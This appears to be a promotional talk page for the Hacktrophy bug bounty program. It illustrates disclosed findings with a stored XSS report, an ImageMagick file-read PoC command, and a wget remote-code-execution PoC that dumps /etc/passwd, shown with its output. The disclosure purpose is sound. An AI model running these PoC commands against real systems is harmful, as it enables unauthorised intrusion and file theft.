Pavol Luptak
CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.
The main advantage of bug bounty programs over traditional penetration tests and security audits:
Disclaimer: The customer explicitly agreed with publishing their findings
`
It's possible to execute arbitrary JavaScript via stored XSS on https://parentalcontrol.eset.com by sending a crafted request to https://edf.eset.com/edf (API used by the mobile app). The payload is executed after clicking the Remove
button in the "Rules -> Exception" section.
Impact
It's possible to impersonate the user logged into the parental control "parent" UI by executing arbitrary JavaScript. This effectively leads to vertical privilege escalation.
hacktrophy is vulnerable to local file inclusion (LFI), due to an outdated version of ImageMagick being used (CVE-2022-44268). Proof-of-Concept: Log into app.hacktrophy.com and upload the attached `poc.png` as profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). Finally, run... $ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync
Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043: PoC wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-
output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
...
The hackers could spot the given vulnerabilities immediately (there is a direct incentive to be the first one), often before official security patches were released.
Thanks to the Hacktrophy Bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.
By Pavol Luptak
In this presentation, we'll discuss real-life scenarios how Hacktrophy helped the customers to reveal serious security vulnerabilities
CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.